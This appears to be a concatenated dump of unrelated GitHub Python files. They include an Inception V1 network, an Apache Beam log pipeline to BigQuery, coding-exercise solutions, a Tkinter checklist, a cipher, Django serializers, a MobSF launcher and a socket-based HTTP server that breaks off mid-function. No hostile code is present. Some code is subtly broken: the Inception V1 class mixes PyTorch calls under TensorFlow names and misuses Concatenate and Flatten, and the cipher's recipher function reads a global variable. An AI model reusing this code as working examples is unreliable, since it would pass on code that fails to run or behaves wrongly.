stacked on top of each other, their output correlation statistics\nare bound to vary: as features of higher abstraction are captured by higher layers, their spatial\nconcentration is expected to decrease suggesting that the ratio of 3*3 and 5*5 convolutions should\nincrease as we move to higher layers.\nOne big problem with the above modules, at least in this naive form, is that even a modest number of\n5*5 convolutions can be prohibitively expensive on top of a convolutional layer with a large number\nof filters. This problem becomes even more pronounced once pooling units are added to the mix:\ntheir number of output filters equals to the number of filters in the previous stage. The merging of\nthe output of the pooling layer with the outputs of convolutional layers would lead to an inevitable\nincrease in the number of outputs from stage to stage. Even while this architecture might cover the\noptimal sparse structure, it would do it very inefficiently, leading to a computational blow up within\na few stages.\nThis leads to the second idea of the proposed architecture: judiciously applying dimension reductions\nand projections wherever the computational requirements would increase too much otherwise.\nThis is based on the success of embeddings: even low dimensional embeddings might contain a lot\nof information about a relatively large image patch. However, embeddings represent information in\na dense, compressed form and compressed information is harder to model. We would like to keep\nour representation sparse at most places (as required by the conditions of [2]) and compress the\nsignals only whenever they have to be aggregated en masse. That is, 1*1 convolutions are used to\ncompute reductions before the expensive 3*3 and 5*5 convolutions. Besides being used as reductions,\nthey also include the use of rectified linear activation which makes them dual-purpose. The\nfinal result is depicted in Figure 2(b).\nIn general, an Inception network is a network consisting of modules of the above type stacked upon\neach other, with occasional max-pooling layers with stride 2 to halve the resolution of the grid. For\ntechnical reasons (memory efficiency during training), it seemed beneficial to start using Inception\nmodules only at higher layers while keeping the lower layers in traditional convolutional fashion.\nThis is not strictly necessary, simply reflecting some infrastructural inefficiencies in our current\nimplementation. ''' \n\nclass Inception_Block(keras.layers.Layer):\n def __init__(self,\n input_channels,\n num1x1,\n Reduction_layer_filters_3_by_3,\n num3x3,\n Reduction_layer_filters_5_by_5,\n num5x5,\n pooling_projectionn,):\n\n super(Inception_Block,self).__init__()\n\n #I will follow the block diagram in Figure 3 and the table 1 in page 6\n self.Block_1=tf.nn.Sequential(\n Convolutional_Block(input_channels, num1x1, convolutional_filters=1, stride=1, padding=0)\n )\n self.Block_2=tf.nn.Sequential(\n Convolutional_Block(input_channels, Reduction_layer_filters_3_by_3, convolutional_filters=1, stride=1, padding=0),\n Convolutional_Block(Reduction_layer_filters_3_by_3, num3x3, convolutional_filters=3, stride=1, padding=1)\n )\n self.Block_3=tf.nn.Sequential(\n Convolutional_Block(input_channels, Reduction_layer_filters_5_by_5, convolutional_filters=1, stride=1, padding=0),\n Convolutional_Block(Reduction_layer_filters_5_by_5, num5x5, convolutional_filters=5, stride=1, padding=2),\n )\n self.Block_4=tf.nn.Sequential(\n tf.nn.MaxPool2d(3, stride=1, padding=1, ceil_mode=True),\n Convolutional_Block(input_channels,pooling_projectionn, convolutional_filters=1, stride=1, padding=0),\n )\n def call(self, input):\n # We need to invoke the Blocks. All of them taking the saem input at the beggining and then \n # we have to concatenate them all together according to the block diagram in the paper\n\n Block_1 = self.Block_1(input)\n Block_2 = self.Block_2(input)\n Block_3 = self.Block_3(input)\n Block_4 = self.Block_4(input)\n #concatenate them all together as in the paper\n return tf.keras.layers.Concatenate([Block_1, Block_2, Block_3, Block_4], 1)\n\n\n\n# Building the Inception_V1 from the block diagram as in the paper\n\nclass Inception_V1(keras.layers.Layer):\n def __init__(self, number_classes=10):\n super(Inception_V1, self).__init__()\n\n self.First_Conv_Block = Convolutional_Block(3, 64, convolutional_filters=7, stride=2, padding=3)\n self.Max_pooling_operation_1st = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n self.Second_Conv_Block = Convolutional_Block(64, 64, convolutional_filters=1, stride=1, padding=0)\n self.Third_Conv_Block = Convolutional_Block(64, 192, convolutional_filters=3, stride=1, padding=1)\n self.Max_pooling_operation_2nd = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n # We have 9 inception block in the paper \n self.Inception_Block_1 = Inception_Block(\n input_channels=192,\n num1x1=64,\n Reduction_layer_filters_3_by_3=96,\n num3x3=128,\n Reduction_layer_filters_5_by_5=16,\n num5x5=32,\n pooling_projectionn=32,\n )\n self.Inception_Block_2 = Inception_Block(\n input_channels=256,\n num1x1=128,\n Reduction_layer_filters_3_by_3=128,\n num3x3=192,\n Reduction_layer_filters_5_by_5=32,\n num5x5=96,\n pooling_projectionn=64,\n )\n self.Max_pooling_operation_3rd = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n\n self.Inception_Block_3 = Inception_Block(\n input_channels=480,\n num1x1=192,\n Reduction_layer_filters_3_by_3=96,\n num3x3=208,\n Reduction_layer_filters_5_by_5=16,\n num5x5=48,\n pooling_projectionn=64,\n )\n self.Inception_Block_4 = Inception_Block(\n input_channels=512,\n num1x1=160,\n Reduction_layer_filters_3_by_3=112,\n num3x3=224,\n Reduction_layer_filters_5_by_5=24,\n num5x5=64,\n pooling_projectionn=64,\n )\n self.Inception_Block_5 = Inception_Block(\n input_channels=512,\n num1x1=128,\n Reduction_layer_filters_3_by_3=128,\n num3x3=256,\n Reduction_layer_filters_5_by_5=24,\n num5x5=64,\n pooling_projectionn=64,\n )\n self.Inception_Block_6 = Inception_Block(\n input_channels=512,\n num1x1=112,\n Reduction_layer_filters_3_by_3=144,\n num3x3=288,\n Reduction_layer_filters_5_by_5=32,\n num5x5=64,\n pooling_projectionn=64,\n )\n self.Inception_Block_7 = Inception_Block(\n input_channels=528,\n num1x1=256,\n Reduction_layer_filters_3_by_3=160,\n num3x3=320,\n Reduction_layer_filters_5_by_5=32,\n num5x5=128,\n pooling_projectionn=128,\n )\n self.Max_pooling_operation_4th = tf.nn.MaxPool2d(3, stride=2, padding=0, ceil_mode=True)\n\n self.Inception_Block_8 = Inception_Block(\n input_channels=832,\n num1x1=256,\n Reduction_layer_filters_3_by_3=160,\n num3x3=320,\n Reduction_layer_filters_5_by_5=32,\n num5x5=128,\n pooling_projectionn=128,\n )\n self.Inception_Block_9 = Inception_Block(\n input_channels=832,\n num1x1=384,\n Reduction_layer_filters_3_by_3=192,\n num3x3=384,\n Reduction_layer_filters_5_by_5=48,\n num5x5=128,\n pooling_projectionn=128,\n )\n self.Max_pooling_operation_5th = tf.nn.AdaptiveAvgPool2d((1, 1))\n\n self.dropout = tf.nn.Dropout(0.4)\n self.fc = tf.nn.Linear(1024, number_classes)\n\n self.Auxiliary_Block_1 = Auxiliary_Block(512, number_classes)\n self.Auxiliary_Block_2 = Auxiliary_Block(528, number_classes)\n\n def call(self, input):\n output = self.First_Conv_Block(input)\n output = self.Max_pooling_operation_1st(output)\n output = self.Second_Conv_Block(output)\n output = self.Third_Conv_Block(output)\n output = self.Max_pooling_operation_2nd(output)\n output = self.Inception_Block_1(output)\n output = self.Inception_Block_2(output)\n output = self.Max_pooling_operation_3rd(output)\n output = self.Inception_Block_3(output)\n\n Auxiliary_Block_1_output = self.Auxiliary_Block_1(output)\n\n output = self.Inception_Block_4(output)\n output = self.Inception_Block_5(output)\n output = self.Inception_Block_6(output)\n\n Auxiliary_Block_2_output = self.Auxiliary_Block_2(output)\n\n output = self.Inception_Block_7(output)\n output = self.Max_pooling_operation_4th(output)\n output = self.Inception_Block_8(output)\n output = self.Inception_Block_9(output)\n output = self.Max_pooling_operation_5th(output)\n output = tf.keras.layers.Flatten(output, 1)\n output = self.dropout(output)\n output = self.fc(output)\n\n return output, Auxiliary_Block_1_output, Auxiliary_Block_2_output\n\n\n\n","repo_name":"akramsalim/Computer-Vision","sub_path":"Inception_V1.py","file_name":"Inception_V1.py","file_ext":"py","file_size_in_byte":14217,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"29379971874","text":"from apache_beam.options.pipeline_options import PipelineOptions\nfrom google.cloud import pubsub_v1\nfrom google.cloud import bigquery\nimport apache_beam as beam\nimport logging\nimport argparse\nimport sys\nimport re\n\n\nPROJECT=\"user-logs-237110\"\nschema = 'remote_addr:STRING, timelocal:STRING, request_type:STRING, status:STRING, body_bytes_sent:STRING, http_referer:STRING, http_user_agent:STRING'\nTOPIC = \"projects/user-logs-237110/topics/userlogs\"\n\n\ndef regex_clean(data):\n\n PATTERNS = [r'(^\\S+\\.[\\S+\\.]+\\S+)\\s',r'(?<=\\[).+?(?=\\])',\n r'\\\"(\\S+)\\s(\\S+)\\s*(\\S*)\\\"',r'\\s(\\d+)\\s',r\"(?<=\\[).\\d+(?=\\])\",\n r'\\\"[A-Z][a-z]+', r'\\\"(http|https)://[a-z]+.[a-z]+.[a-z]+']\n result = []\n for match in PATTERNS:\n try:\n reg_match = re.search(match, data).group()\n if reg_match:\n result.append(reg_match)\n else:\n result.append(\" \")\n except:\n print(\"There was an error with the regex search\")\n result = [x.strip() for x in result]\n result = [x.replace('\"', \"\") for x in result]\n res = ','.join(result)\n return res\n\n\nclass Split(beam.DoFn):\n\n def process(self, element):\n from datetime import datetime\n element = element.split(\",\")\n d = datetime.strptime(element[1], \"%d/%b/%Y:%H:%M:%S\")\n date_string = d.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n return [{ \n 'remote_addr': element[0],\n 'timelocal': date_string,\n 'request_type': element[2],\n 'body_bytes_sent': element[3],\n 'status': element[4],\n 'http_referer': element[5],\n 'http_user_agent': element[6]\n \n }]\n\ndef main(argv=None):\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_topic\")\n parser.add_argument(\"--output\")\n known_args = parser.parse_known_args(argv)\n\n\n p = beam.Pipeline(options=PipelineOptions())\n\n (p\n | 'ReadData' >> beam.io.ReadFromPubSub(topic=TOPIC).with_output_types(bytes)\n | \"Decode\" >> beam.Map(lambda x: x.decode('utf-8'))\n | \"Clean Data\" >> beam.Map(regex_clean)\n | 'ParseCSV' >> beam.ParDo(Split())\n | 'WriteToBigQuery' >> beam.io.WriteToBigQuery('{0}:userlogs.streaminglogs'.format(PROJECT), schema=schema,\n write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND)\n )\n result = p.run()\n result.wait_until_finish()\n\nif __name__ == '__main__':\n logger = logging.getLogger().setLevel(logging.INFO)\n main()\n","repo_name":"DFoly/User_log_pipeline","sub_path":"main_pipeline_stream.py","file_name":"main_pipeline_stream.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"67"} +{"seq_id":"25135407348","text":"\"\"\"\nGiven two integer arrays arr1 and arr2,\nreturn the minimum number of operations (possibly zero) needed to make arr1 strictly increasing.\n\nIn one operation,\nyou can choose two indices 0 <= i < arr1.length and 0 <= j < arr2.length and do the assignment arr1[i] = arr2[j].\n\nIf there is no way to make arr1 strictly increasing, return -1.\n\"\"\"\nimport bisect\nfrom typing import List\n\n\nclass Solution:\n def makeArrayIncreasing(self, arr1: List[int], arr2: List[int]) -> int:\n\n arr2.sort()\n def find(value):\n res = float('inf')\n left, right = 0, len(arr2) - 1\n while left <= right:\n pivot = (left + right) // 2\n if arr2[pivot] > value:\n res = min(res, arr2[pivot])\n right = pivot - 1\n else:\n left = pivot + 1\n\n return res if res != float('inf') else -1\n\n visited = {}\n\n def dp(index, prev):\n if index == len(arr1):\n return 0\n if (index, prev) in visited:\n return visited[(index, prev)]\n\n res = float('inf')\n\n if arr1[index] > prev:\n res = min(res, dp(index + 1, arr1[index]))\n\n greater_than = find(prev)\n if greater_than != -1:\n res = min(res, 1 + dp(index + 1, greater_than))\n\n visited[(index, prev)] = res\n\n return res\n\n res = dp(0, -1)\n return res if res != float('inf') else -1\n\n\n\nif __name__ == '__main__':\n arr1 = [1, 5, 3, 6, 7]\n arr2 = [1, 3, 2, 4]\n sol = Solution()\n result = sol.makeArrayIncreasing(arr1, arr2)\n print(result)\n","repo_name":"ilyakuzmin9/leetcode","sub_path":"1187_make-array-strictly-increasing.py","file_name":"1187_make-array-strictly-increasing.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42282842076","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport torch\n\n\n# # torch tensor常用操作\n\n# In[3]:\n\n\nx = torch.tensor([[1,2,3,4],\n [4,3,2,1]], \n dtype=torch.float32)\nx\n\n\n# ## x.argmax(dim=n) \n# - 按照维度,取最大值的索引\n\n# In[4]:\n\n\nx.argmax(dim=1) # 按照列,实际上就是行\n\n\n# ## x.softmax(dim=n)\n# - 相加得1的概率分布\n\n# In[5]:\n\n\nx.softmax(dim=1)\n\n\n# In[6]:\n\n\ny = torch.randn(1,4)\ny\n\n\n# ## torch.cat((x, y), dim=0)\n# - 对数据沿着某一维度进行拼接。\n# - cat后数据的总维数不变。\n# - 比如下面代码对两个2维tensor(分别为2*4,1*4)进行拼接,拼接完后变为3*4还是2维的tensor。\n\n# In[7]:\n\n\ntorch.cat((x, y), dim=0) # 合并,其余维度相同\n\n\n# ## torch.stack() 增加新的维度进行堆叠\n# - stack则会增加新的维度。\n# - 如对两个1*2维的tensor在第0个维度上stack,则会变为2*1*2的tensor;在第1个维度上stack,则会变为1*2*2的tensor。\n\n# In[8]:\n\n\na = torch.randn(1,2)\na\n\n\n# In[9]:\n\n\nb = torch.randn(1,2)\nb\n\n\n# In[10]:\n\n\nc = torch.stack((a, b), dim=0)\nc\n\n\n# In[11]:\n\n\nc.size()\n\n\n# In[12]:\n\n\nd = torch.stack((a, b), dim=1)\nd\n\n\n# ## transpose 交换维度\n# - 维度互换,只能两个维度\n\n# In[13]:\n\n\nx\n\n\n# In[14]:\n\n\nx.transpose(0,1)\n\n\n# In[15]:\n\n\nx.transpose(1,0)\n\n\n# In[16]:\n\n\nx = torch.randn(2,3,5)\nx\n\n\n# In[17]:\n\n\nx.transpose(1,2)\n\n\n# In[18]:\n\n\nx.transpose(1,2).size()\n\n\n# ## x.permute()\n# - 适合多维数据,更灵活的transpose\n# - permute是更灵活的transpose,可以灵活的对原数据的维度进行调换,而数据本身不变。\n\n# In[19]:\n\n\nx = torch.randn(2,3,5)\nx\n\n\n# In[20]:\n\n\ny = x.permute(1,2,0)\ny.size()\n\n\n# In[21]:\n\n\ny\n\n\n# ## x.reshape()\n# - 数据不变,改变tensor的形状\n\n# In[22]:\n\n\nx.shape\n\n\n# In[23]:\n\n\nx.reshape(3,1,10)\n\n\n# In[24]:\n\n\nx.reshape(5,6)\n\n\n# ## x.view()\n# - 改变形状\n\n# In[25]:\n\n\nx.view(-1, 2, 3)\n\n\n# In[26]:\n\n\nx.view(-1, 15)\n\n\n# In[27]:\n\n\nx\n\n\n# ## x.unsqueeze/squeeze\n# - squeeze(dim_n)压缩,即去掉元素数量为1的dim_n维度。\n# - 同理unsqueeze(dim_n),增加dim_n维度,元素数量为1。\n\n# In[28]:\n\n\nx = torch.randn(5,1,3)\nx.size()\n\n\n# In[29]:\n\n\nx.squeeze(dim=1).size()\n\n\n# In[30]:\n\n\n# squeeze 挤压\nx.unsqueeze(dim=0).size()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"zingp/ml-py-lib","sub_path":"PyTorchCS/torch_tensor.py","file_name":"torch_tensor.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36953015894","text":"from tkinter import *\nfrom tkinter import messagebox\n\ndef addItem():\n item = entry.get()\n if item != \"\":\n listBox.insert(END, item)\n entry.delete(0, END)\n else:\n messagebox.showerror(\"Error\", \"Enter something\")\n\n\ndef deleteItem(event=None):\n try:\n if event:\n selected = listBox.nearest(event.y)\n else:\n selected = listBox.curselection()[0]\n item = listBox.get(selected)\n if item.startswith('\\u2713'):\n item = item[1:]\n listBox.delete(selected)\n listBox.insert(selected, item)\n listBox.itemconfig(selected, {'fg': 'black'})\n else:\n checkedItem = \"\\u2713\" + item\n listBox.delete(selected)\n listBox.insert(selected, checkedItem)\n listBox.itemconfig(selected, {'fg': 'gray'})\n except Exception as e:\n print(e)\n messagebox.showerror(\"Error\", \"Select something\")\n\n\nroot = Tk()\nroot.title(\"Checklist App\")\nroot.geometry(\"800x800\")\n\nframe1 = Frame(root)\nframe1.pack(padx=10, pady=10)\n\nlistBox = Listbox(frame1, width=60, height=30, font=('Arial', 14))\nlistBox.pack(side=LEFT, fill=Y)\n\nscrollBar = Scrollbar(frame1, orient=VERTICAL)\nscrollBar.config(command=listBox.yview)\nscrollBar.pack(side=LEFT, fill=Y)\n\nlistBox.config(yscrollcommand=scrollBar.set)\n# Bind the double-click event to the deleteItem function\nlistBox.bind('', deleteItem)\n\n# Pre-set list of items with separators\npreSetItems = [ \"СПАЛЬНАЯ СИСТЕМА\",\"---\",\"Спальник\", \"Коврик / Матрас\",\"Спальная одежда\", \"Подушка (при наличии)\",\n \" \",\n \"КУХНЯ\", \"---\", \"Вилка / Ложка\", \"Кружка\", \"Тарелка глубокая\",\n \" \",\n\n \"ВНЕШНЕЕ\", \"---\", \"Рюкзак\", \"Обувь (походная)\", \"Куртка непродуваемая\", \"Штаны\", \"Термобелье\", \"Носки (3-4 пары)\",\n \"Утепление для лагеря\",\n '',\n\n \"ДОПОЛНИТЕЛЬНО\", \"---\", \"Гигиена ( туалетка, щетка и тд)\", \"Салфетки влажные\", \"Зажигалка\", \"Нож (маленький)\",\n \"Мусорный мешок\", \"Фонарь налобный\", \"Павербанк\", \"Накидка от дождя\"\n\n ]\n\n# Insert pre-set items into the Listbox\nfor item in preSetItems:\n if item.startswith(\"---\"):\n listBox.insert(END, \"-\"*60) # insert separator line\n else:\n listBox.insert(END, item)\n\nentry = Entry(root, width=40, font=('Arial', 14))\nentry.pack(padx=10, pady=10)\n\nframe2 = Frame(root)\nframe2.pack(padx=10, pady=10)\n\naddButton = Button(frame2, text=\"Add\", font=('Arial', 14), command=addItem)\naddButton.pack(side=LEFT)\n\ndeleteButton = Button(frame2, text=\"Check\", font=('Arial', 14), command=deleteItem)\ndeleteButton.pack(side=LEFT, padx=10)\n\nroot.mainloop()\n","repo_name":"Troppppr/CheckListApp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71236265814","text":"def cipher(sentence):\n chara_list = []\n for i in range(len(sentence)):\n if sentence[i].islower() == True:\n convert_chara = chr(219 - ord(sentence[i]))\n chara_list.append(convert_chara)\n else:\n chara_list.append(sentence[i])\n reverse_sentence = \"\".join(chara_list)\n return reverse_sentence\n\ndef recipher(sentence):\n chara_list = []\n for i in range(len(sentence)):\n if reverse_sentence[i].islower() == True:\n re_chara = chr(219 - ord(sentence[i]))\n chara_list.append(re_chara)\n else:\n chara_list.append(sentence[i])\n re_sentence = \"\".join(chara_list)\n return re_sentence\n\n\nif __name__ == '__main__':\n sentence = \"\"\n reverse_sentence = cipher(sentence)\n print(reverse_sentence)\n resentence = recipher(reverse_sentence)\n print(resentence)","repo_name":"yukou-isshiki/NLP_100_exercise_2020","sub_path":"1/1-8-1.py","file_name":"1-8-1.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43590889478","text":"\n\"\"\"\nClarification (~2 min)\nStart with the naive solution (~3 min)\nOptimize the naive solution (~10 min)\nTranslate the pseudocode into real code (~15 min)\nTest thoroughly (5 min)\nAnalyze time and space complexity (1 min)\n\"\"\"\n\n# Time: O(n)\n# Space: O(n)\n\n\ndef main(string):\n pattern = [-1 for _ in string]\n j = 0\n i = 1\n while i < len(string):\n if string[i] == string[j]:\n pattern[i] = j\n i += 1\n j += 1\n elif j > 0:\n j = pattern[j - 1] + 1\n else:\n i += 1\n return j\n\n\n# Test case 1: Normal or Given input\nprint(main(\"abab\"))\n# Test case 2: Normal or Given input\nprint(main(\"aaaa\"))\n# Test case 3: Normal or Given input\nprint(main(\"gigummcnu\"))\n# Test case 4: Negative\nprint(main(\"u\"))\n# Test case 5: Empty\n# print(s.main())\n# Test case 6: Too long\n# print(s.main())\n# Test case 7\n# Test case 8\n# Test case 9","repo_name":"gunjanmodi/algorithms","sub_path":"algorithms/strings/longest_prefix_suffix.py","file_name":"longest_prefix_suffix.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32766881001","text":"import os\nimport os.path\nimport re\nimport shutil\n\npath = \"C:\\\\temp\"\nfiles = os.listdir(path)\n\nREGEXES = [(re.compile(r'

     

    '), ''),\n (re.compile(r' '), ''),\n (re.compile(r' style=\"list-style: decimal;\"'), ''),\n (re.compile(r'\\s*
      '), ''),\n (re.compile(r'
    \\s*
      '), ''),\n (re.compile(r'
      '), ''),\n (re.compile(r'

      \\s*()\\s*

      '), r'
      \\1
      '),\n (re.compile(r'\"(.*?)\"'), r'\\1'),\n (re.compile(r'(.*?)'), r'\\1'),\n (re.compile(r'(.*?)'), r'\\1'),\n (re.compile(r'(.*?)'), r'\\1'),\n (re.compile(r'(.*?)'), r'\\1'),\n (re.compile(r'

      (.*?)

      '), r'

      \\1

      ')]\n\nfor f in files:\n file_name, file_extension = os.path.splitext(f)\n\n if file_extension in ('.htm', '.html'):\n generated_output_file = file_name + \"_regex\" + file_extension\n\n input_file = os.path.join(path, f)\n output_file = os.path.join(path, generated_output_file)\n\n with open(input_file, \"r\") as fi, open(output_file, \"w+\") as fo:\n file_content = fi.read()\n # file_content = htmlmin.minify(file_content, remove_optional_attribute_quotes=False, reduce_empty_attributes=False, pre_tags=(u'img'), remove_empty_space=True)\n for search, replace in REGEXES:\n file_content = search.sub(replace, file_content)\n fo.write(file_content)\n\n # Overwrite original file\n shutil.move(output_file, input_file)\n","repo_name":"lvaylet/html_sanitizer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18491529752","text":"from orderbookbase import *\n\nclass OrderBook__model(OrderBookBase):\n def config(self):\n self.market = \"_model\"\n self.shortmarketname = \"_model\"\n\n #if self.cur2!=\"EUR\" or self.cur1!=\"BTC\":\n # raise(Exception(\"BTCUSD only\"))\n if not (self.cur2 in [\"USD\", \"EUR\"]) or self.cur1!=\"BTC\":\n raise(Exception(\"Symbol {symbol} not supported\".format(symbol=self.symbol)))\n #raise(Exception(\"BTCUSD or BTCUSD\"))\n\n self.url = \"https://www.....json\"\n \n raise(Exception(\"ToDo\"))\n\n def convert_to_DataFrame(self):\n cur1_amount = \"{cur1}_amount\".format(cur1=self.cur1.lower())\n columns = ['price', cur1_amount]\n \n try:\n self.orders['asks'] = pd.DataFrame(self.data['asks'], columns=columns)\n except:\n self.orders['asks'] = pd.DataFrame(columns=columns)\n \n try:\n self.orders['bids'] = pd.DataFrame(self.data['bids'], columns=columns)\n except:\n self.orders['bids'] = pd.DataFrame(columns=columns)\n \n self.convert_data() # convert unicode to float","repo_name":"Amrt1n3zm/working4arbitrage","sub_path":"working4arbitrage/trunk/src/orderbook__model.py","file_name":"orderbook__model.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"4111505290","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom mit.models import (\n Faculty,\n WorkType,\n GenericWork,\n PublicationInfo,\n CourseInfo,\n Topic,\n Location,\n )\n\nclass ContentTypeSerializer(ModelSerializer):\n class Meta:\n model = ContentType\n\nclass FacultySerializer(ModelSerializer):\n class Meta:\n model = Faculty\n\nclass TopicSerializer(ModelSerializer):\n class Meta:\n model = Topic\n\nclass LocationSerializer(ModelSerializer):\n class Meta:\n model = Location\n\nclass WorkTypeSerializer(ModelSerializer):\n class Meta:\n model = WorkType\n\nclass CourseInfoSerializer(ModelSerializer):\n semesters = serializers.RelatedField(many=True)\n class Meta:\n model = CourseInfo\n fields = (\n 'course_codes',\n 'is_studio',\n 'is_workshop',\n 'is_practicum',\n 'semesters',\n )\n\nclass PublicationInfoSerializer(ModelSerializer):\n medium = serializers.RelatedField()\n publishers = serializers.RelatedField(many=True)\n periodicals = serializers.RelatedField(many=True)\n class Meta:\n model = PublicationInfo\n fields = (\n 'date_published',\n 'publishers',\n 'periodicals',\n 'medium',\n )\n\nclass GenericWorkSerializer(ModelSerializer):\n publicationinfo = PublicationInfoSerializer()\n courseinfo = CourseInfoSerializer()\n class Meta:\n model = GenericWork\n fields = (\n 'work_types',\n 'title',\n 'faculty',\n 'website',\n 'topics',\n 'locations',\n 'non_dusp_collaborators',\n 'start_date',\n 'end_date',\n 'subworks',\n 'publicationinfo',\n 'courseinfo',\n )\n\n\n\n\n\n","repo_name":"bengolder/explorer","sub_path":"explorer/mit/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25338284600","text":"import os\nimport sys\nimport platform\n\nfrom django.core.management import execute_from_command_line\nfrom django.db import connection\n\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobsf.MobSF.settings')\n\n\ndef db():\n execute_from_command_line([\n '',\n 'makemigrations',\n ])\n execute_from_command_line([\n '',\n 'makemigrations',\n 'StaticAnalyzer',\n ])\n execute_from_command_line([\n '',\n 'migrate',\n ])\n\n\ndef main():\n try:\n if not connection.introspection.table_names():\n db()\n except Exception:\n db()\n listen = '127.0.0.1:8000'\n if len(sys.argv) == 2 and sys.argv[1]:\n if sys.argv[1] == 'db':\n db()\n listen = None\n elif sys.argv[1]:\n listen = sys.argv[1]\n if not listen:\n exit(0)\n if platform.system() != 'Windows':\n sys.argv = [\n '',\n '-b',\n listen,\n 'mobsf.MobSF.wsgi:application',\n '--workers=1',\n '--threads=10',\n '--timeout=3600',\n '--log-level=citical',\n '--log-file=-',\n '--access-logfile=-',\n '--error-logfile=-',\n '--capture-output',\n ]\n from gunicorn.app.wsgiapp import run\n run()\n else:\n from waitress import serve\n from .MobSF import wsgi\n serve(\n wsgi.application,\n listen=listen,\n threads=10,\n channel_timeout=3600)\n","repo_name":"MobSF/Mobile-Security-Framework-MobSF","sub_path":"mobsf/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":15251,"dataset":"github-code","pt":"67"} +{"seq_id":"5701639682","text":"# -*- coding: utf-8 -*-\r\nimport math\r\nfrom .tfidf import top\r\nfrom .config import *\r\nfrom .keyword_extraction import Doc\r\nimport urllib.request\r\nimport re\r\nimport os\r\nimport requests\r\n\r\nclass CandidateSearch():\r\n @staticmethod\r\n def _search(n, list_keyword):\r\n # t = time.time()\r\n url = 'http://202.191.57.85:8080/APISearchEs/SearchLimited/SearchESLimitFile?numberFile=' + str(n) + '&keyword='\r\n for keyword_ in list_keyword:\r\n keyword = re.sub('_',' ',keyword_)\r\n url = url + keyword + '+'\r\n url = url[:-1]\r\n r = requests.get(url)\r\n return r.json()[\"hits\"][\"hits\"]\r\n\r\n @staticmethod\r\n def search(num_file, text, log_file=None):\r\n doc = Doc(text)\r\n list_keyword = doc.getKeyWord()\r\n result = CandidateSearch._search(num_file, list_keyword)\r\n if log_file is not None:\r\n with open(log_file, 'w+', encoding='utf-8') as file:\r\n file.write(str(list_keyword))\r\n file.write('\\n\\n')\r\n file.write(json.dumps(result))\r\n return result\r\n\r\nimport json\r\nimport sys\r\nif __name__ == \"__main__\":\r\n num_file = sys.argv[1]\r\n filepath = sys.argv[2]\r\n log_file = None\r\n try:\r\n log_file = sys.argv[3]\r\n except:\r\n pass\r\n text = open(filepath, \"r\", encoding=\"utf-8\").read()\r\n print(json.dumps(CandidateSearch.search(num_file, text, log_file)))\r\n\r\n\"\"\"\r\npython -m candidate_search.run 12 \"E:/1.txt\"\r\n\"\"\"","repo_name":"TrinhHaiSon/PlagiarismDetection","sub_path":"candidate_search/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"21191902390","text":"#import socket module\r\nimport sys\r\nimport threading\r\nimport time\r\nfrom socket import *\r\ndef server(connectionSocket):\r\n print (\"Starting a new thread\")\r\n try:\r\n message = connectionSocket.recv(1024)\r\n print(message)\r\n if(message != \"\"):\r\n filename = message.split()[1]\r\n print(\"looking for file \", filename)\r\n f = open(filename[1:])\r\n outputdata = f.read()\r\n extension = filename.split(\".\")[1]\r\n \r\n if(extension == \"gif\"):\r\n content = \"image/gif\"\r\n elif(extension == \"jpeg\"):\r\n content = \"image/jpeg\"\r\n elif(extension == \"png\"):\r\n content = \"image/png\"\r\n else:\r\n content = \"text/html\"\r\n \r\n #Send one HTTP header line into socket\r\n Myheader = \"HTTP/1.1 200 OK\\r\\nContent-Type: \" + content + \"\\r\\n\\r\\n\"\r\n print (Myheader)\r\n print(outputdata)\r\n connectionSocket.sendall(Myheader)\r\n print (Myheader)\r\n print(outputdata)\r\n #Send the content of the requested file to the client\r\n for i in range(0, len(outputdata)):\r\n connectionSocket.send(outputdata[i])\r\n connectionSocket.close()\r\n \r\n except IOError:\r\n if(filename == \"/helloworld.html\"):\r\n connectionSocket.send(\"HTTP/1.1 301 Moved Permanently\\r\\n Location: http://www.hello_world2.html\\r\\n\\r\\n\")\r\n connectionSocket.send(\"

      301 Moved Permanently

      \\r\\n\")\r\n else:\r\n #Send response message for file not found\r\n connectionSocket.send(\"HTTP/1.1 404 Not Found\\r\\n\\r\\n\")\r\n connectionSocket.send(\"

      404 Not Found

